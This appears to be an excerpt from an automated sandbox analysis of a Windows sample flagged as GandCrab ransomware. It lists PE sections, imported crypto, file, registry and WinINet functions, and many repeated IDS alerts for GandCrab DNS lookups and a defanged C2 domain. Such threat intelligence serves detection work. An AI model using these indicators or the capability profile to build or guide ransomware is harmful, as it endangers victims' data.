.rsrc	0x14000	0x1000	0x200	False	0.52734375	data	4.710061382693063	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x15000	0x1000	0xc00	False	0.008138020833333334	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x14060	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	SetFilePointer, GetFileAttributesW, ReadFile, GetLastError, MoveFileW, lstrcpyW, SetFileAttributesW, CreateMutexW, GetDriveTypeW, VerSetConditionMask, WaitForSingleObject, GetTickCount, InitializeCriticalSection, OpenProcess, GetSystemDirectoryW, TerminateThread, Sleep, TerminateProcess, VerifyVersionInfoW, WaitForMultipleObjects, DeleteCriticalSection, ExpandEnvironmentStringsW, lstrlenW, SetHandleInformation, lstrcatA, MultiByteToWideChar, CreatePipe, lstrcmpiA, Process32NextW, CreateToolhelp32Snapshot, LeaveCriticalSection, EnterCriticalSection, FindFirstFileW, lstrcmpW, FindClose, FindNextFileW, GetNativeSystemInfo, GetComputerNameW, GetDiskFreeSpaceW, GetWindowsDirectoryW, GetVolumeInformationW, LoadLibraryA, lstrcmpiW, VirtualFree, CreateThread, CloseHandle, lstrcatW, CreateFileMappingW, ExitThread, CreateFileW, GetModuleFileNameW, WriteFile, GetModuleHandleW, UnmapViewOfFile, MapViewOfFile, GetFileSize, GetEnvironmentVariableW, lstrcpyA, GetModuleHandleA, VirtualAlloc, Process32FirstW, GetTempPathW, GetProcAddress, GetProcessHeap, HeapFree, HeapAlloc, lstrlenA, CreateProcessW, ExitProcess, IsProcessorFeaturePresent
USER32.dll	wsprintfW, TranslateMessage, RegisterClassExW, LoadIconW, SetWindowLongW, EndPaint, BeginPaint, LoadCursorW, GetMessageW, ShowWindow, CreateWindowExW, SendMessageW, DispatchMessageW, DefWindowProcW, UpdateWindow, GetForegroundWindow, DestroyWindow
GDI32.dll	TextOutW
ADVAPI32.dll	CryptExportKey, AllocateAndInitializeSid, RegSetValueExW, RegCreateKeyExW, RegCloseKey, CryptAcquireContextW, CryptGetKeyParam, CryptReleaseContext, CryptImportKey, CryptEncrypt, CryptGenKey, CryptDestroyKey, GetUserNameW, RegQueryValueExW, RegOpenKeyExW, FreeSid
SHELL32.dll	SHGetSpecialFolderPathW, ShellExecuteExW, ShellExecuteW
CRYPT32.dll	CryptStringToBinaryA, CryptBinaryToStringA
WININET.dll	InternetCloseHandle, HttpAddRequestHeadersW, HttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetOpenW, InternetReadFile
PSAPI.DLL	EnumDeviceDrivers, GetDeviceDriverBaseNameW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.38.8.8.855642532829498 09/01/22-00:01:41.321667	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55642	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860090532829500 09/01/22-00:02:16.489371	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	60090	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.862436532026737 09/01/22-00:02:57.542714	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62436	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.855955532829500 09/01/22-00:03:25.632008	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	55955	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853431532829498 09/01/22-00:02:18.409896	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53431	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865513532829500 09/01/22-00:02:19.430995	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	65513	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864276532829498 09/01/22-00:03:00.100399	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64276	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851891532026737 09/01/22-00:03:31.975246	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51891	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859765532026737 09/01/22-00:03:34.032990	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59765	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853309532829500 09/01/22-00:01:54.918396	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	53309	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.854155532829498 09/01/22-00:02:39.711366	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	54155	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.849169532829500 09/01/22-00:02:32.443414	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	49169	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864378532829500 09/01/22-00:03:19.972139	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64378	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857391532829500 09/01/22-00:02:53.276938	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	57391	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851597532026737 09/01/22-00:03:26.976848	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51597	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853271532829498 09/01/22-00:02:55.260307	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53271	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853471532829500 09/01/22-00:02:00.665796	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	53471	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865323532026737 09/01/22-00:01:43.859132	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	65323	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860647532829498 09/01/22-00:03:25.300157	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60647	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.850230532026737 09/01/22-00:02:54.735839	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50230	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.850624532026737 09/01/22-00:03:18.677171	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50624	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853468532829500 09/01/22-00:02:00.604247	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	53468	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.858122532829498 09/01/22-00:02:27.905128	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	58122	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.854436532829498 09/01/22-00:03:36.045306	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	54436	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.862426532026737 09/01/22-00:03:13.145963	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62426	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.856046532829500 09/01/22-00:01:38.500367	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56046	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859378532829500 09/01/22-00:02:48.340518	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	59378	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.858305532026737 09/01/22-00:02:34.497221	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	58305	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.861418532829498 09/01/22-00:02:02.984507	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61418	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.850095532026737 09/01/22-00:03:38.741458	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50095	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.852114532026737 09/01/22-00:03:20.324395	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52114	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865466532829500 09/01/22-00:03:37.373699	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	65466	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853042532026737 09/01/22-00:03:06.339869	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	53042	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.849877532829500 09/01/22-00:02:36.035379	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	49877	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864971532829500 09/01/22-00:03:05.617213	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64971	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.861186532829498 09/01/22-00:02:52.648140	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61186	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859829532829500 09/01/22-00:02:55.953112	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	59829	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.849204532026737 09/01/22-00:02:46.678054	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	49204	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.861364532829498 09/01/22-00:03:28.558638	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61364	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857829532829500 09/01/22-00:03:23.021549	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	57829	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.850788532026737 09/01/22-00:02:43.387386	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50788	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851996532026737 09/01/22-00:02:26.312895	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51996	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857706532829500 09/01/22-00:01:42.686131	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	57706	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859436532026737 09/01/22-00:01:57.638087	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59436	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859822532026737 09/01/22-00:02:19.952319	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59822	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860587532026737 09/01/22-00:01:27.550732	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	60587	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.852957532829500 09/01/22-00:01:25.328522	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	52957	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.858914532829500 09/01/22-00:03:18.020601	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	58914	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853850532026737 09/01/22-00:01:50.247028	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	53850	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.856619532026737 09/01/22-00:02:49.126045	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	56619	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.852112532026737 09/01/22-00:03:20.284135	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52112	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865198532829500 09/01/22-00:02:04.768621	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	65198	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853848532829498 09/01/22-00:01:59.462827	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53848	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851893532026737 09/01/22-00:03:32.036713	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51893	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.854433532829498 09/01/22-00:03:35.979601	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	54433	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853310532829500 09/01/22-00:01:54.940366	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	53310	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859438532026737 09/01/22-00:01:57.681285	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59438	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.861421532829498 09/01/22-00:02:03.043258	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61421	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.852458532026737 09/01/22-00:03:02.844406	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52458	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.855652532829498 09/01/22-00:03:19.259211	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55652	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.861130532829498 09/01/22-00:03:15.942186	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61130	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860421532829498 09/01/22-00:03:32.382333	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60421	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864973532829500 09/01/22-00:03:05.661525	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64973	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.863567532026737 09/01/22-00:02:17.089606	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	63567	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865463532829500 09/01/22-00:03:37.309587	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	65463	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865389532026737 09/01/22-00:02:38.719558	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	65389	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853040532026737 09/01/22-00:03:06.300781	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	53040	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857827532829500 09/01/22-00:03:22.978908	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	57827	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853039532026737 09/01/22-00:03:06.280270	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	53039	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859585532026737 09/01/22-00:02:11.746820	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59585	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857708532829500 09/01/22-00:01:42.729663	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	57708	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851142532829498 09/01/22-00:01:24.090037	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51142	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853433532829498 09/01/22-00:02:18.458138	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53433	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860093532829500 09/01/22-00:02:16.558554	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	60093	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.849206532026737 09/01/22-00:02:46.717208	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	49206	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851143532829498 09/01/22-00:01:24.124615	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51143	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.854158532829498 09/01/22-00:02:39.772185	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	54158	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859376532829500 09/01/22-00:02:48.263272	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	59376	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864825532829500 09/01/22-00:02:24.749273	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64825	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864273532829498 09/01/22-00:03:00.036817	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64273	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851894532026737 09/01/22-00:03:32.055555	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51894	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.854434532829498 09/01/22-00:03:36.001169	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	54434	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859768532026737 09/01/22-00:03:34.095324	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59768	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853054532829498 09/01/22-00:02:15.078816	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53054	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.863448532829498 09/01/22-00:02:35.455212	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	63448	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865111532829500 09/01/22-00:01:46.954181	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	65111	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853627532026737 09/01/22-00:02:01.832804	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	53627	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865200532829500 09/01/22-00:02:04.820486	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	65200	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.855461532829498 09/01/22-00:03:07.325312	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55461	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865390532026737 09/01/22-00:02:38.738598	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	65390	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865516532829500 09/01/22-00:02:19.492210	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	65516	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.855654532829498 09/01/22-00:03:19.297074	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55654	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.854288532829500 09/01/22-00:03:33.756470	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	54288	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865515532829500 09/01/22-00:02:19.472414	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	65515	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859767532026737 09/01/22-00:03:34.075907	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59767	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860649532829498 09/01/22-00:03:25.341169	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60649	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853628532026737 09/01/22-00:02:01.851234	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	53628	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864970532829500 09/01/22-00:02:44.867082	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64970	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.862434532026737 09/01/22-00:02:57.492445	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62434	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859583532026737 09/01/22-00:02:11.706174	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59583	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.850232532026737 09/01/22-00:02:54.777871	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50232	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.852959532829500 09/01/22-00:01:25.367458	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	52959	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.850787532026737 09/01/22-00:02:43.367194	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50787	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.858123532829498 09/01/22-00:02:27.969558	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	58123	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860423532829498 09/01/22-00:03:32.424188	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60423	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865201532829500 09/01/22-00:02:04.842170	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	65201	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.854157532829498 09/01/22-00:02:39.751533	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	54157	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865112532829500 09/01/22-00:01:46.974641	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	65112	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859830532829500 09/01/22-00:02:55.974495	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	59830	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.855460532829498 09/01/22-00:03:07.301197	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55460	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853307532829500 09/01/22-00:01:54.875889	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	53307	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.851595532026737 09/01/22-00:03:26.929732	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51595	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.856044532829500 09/01/22-00:01:38.460693	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56044	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857828532829500 09/01/22-00:03:23.000023	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	57828	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864606532829500 09/01/22-00:02:41.903320	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64606	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853273532829498 09/01/22-00:02:55.304130	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53273	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.856047532829500 09/01/22-00:01:38.529181	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56047	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.850626532026737 09/01/22-00:03:18.717464	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50626	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.863691532829498 09/01/22-00:03:21.687512	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	63691	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859825532026737 09/01/22-00:02:20.014612	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59825	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.855954532829500 09/01/22-00:03:25.612012	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	55954	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.862428532026737 09/01/22-00:03:13.188986	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62428	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.861419532829498 09/01/22-00:02:03.004767	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61419	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860474532829498 09/01/22-00:02:47.119975	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60474	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864274532829498 09/01/22-00:03:00.057400	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64274	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853853532026737 09/01/22-00:01:50.543832	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	53853	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.855248532829498 09/01/22-00:03:03.486266	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55248	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853432532829498 09/01/22-00:02:18.428585	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53432	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.853849532829498 09/01/22-00:01:59.483040	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53849	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859586532026737 09/01/22-00:02:11.767488	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59586	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860477532829498 09/01/22-00:02:47.180255	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60477	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.852743532026737 09/01/22-00:03:23.998658	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52743	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.849170532829500 09/01/22-00:02:32.467435	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	49170	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865325532026737 09/01/22-00:01:43.903174	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	65325	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857575532829498 09/01/22-00:01:53.271847	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	57575	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.849879532829500 09/01/22-00:02:36.072251	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	49879	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859640532026737 09/01/22-00:01:39.971866	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59640	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865109532829500 09/01/22-00:01:46.914019	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	65109	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.863450532829498 09/01/22-00:02:35.496675	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	63450	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860646532829498 09/01/22-00:03:25.281760	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60646	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.854285532829500 09/01/22-00:03:33.695070	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	54285	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.858915532829500 09/01/22-00:03:18.040653	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	58915	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864974532829500 09/01/22-00:03:05.683602	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64974	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.858482532829500 09/01/22-00:03:29.362481	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	58482	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864125532829498 09/01/22-00:02:44.347197	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64125	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.859437532026737 09/01/22-00:01:57.658266	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59437	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.857137532829498 09/01/22-00:01:34.192981	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	57137	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.860819532829500 09/01/22-00:03:08.807703	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	60819	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.864598532829498 09/01/22-00:02:22.069673	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64598	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.865388532026737 09/01/22-00:02:38.683294	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	65388	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.852460532026737 09/01/22-00:03:02.922606	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52460	53	192.168.2.3	8.8.8.8
192.168.2.38.8.8.861361532829498 09/01/22-00:03:28.363595	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61361	53	192.168.2.3	8.8.8.8
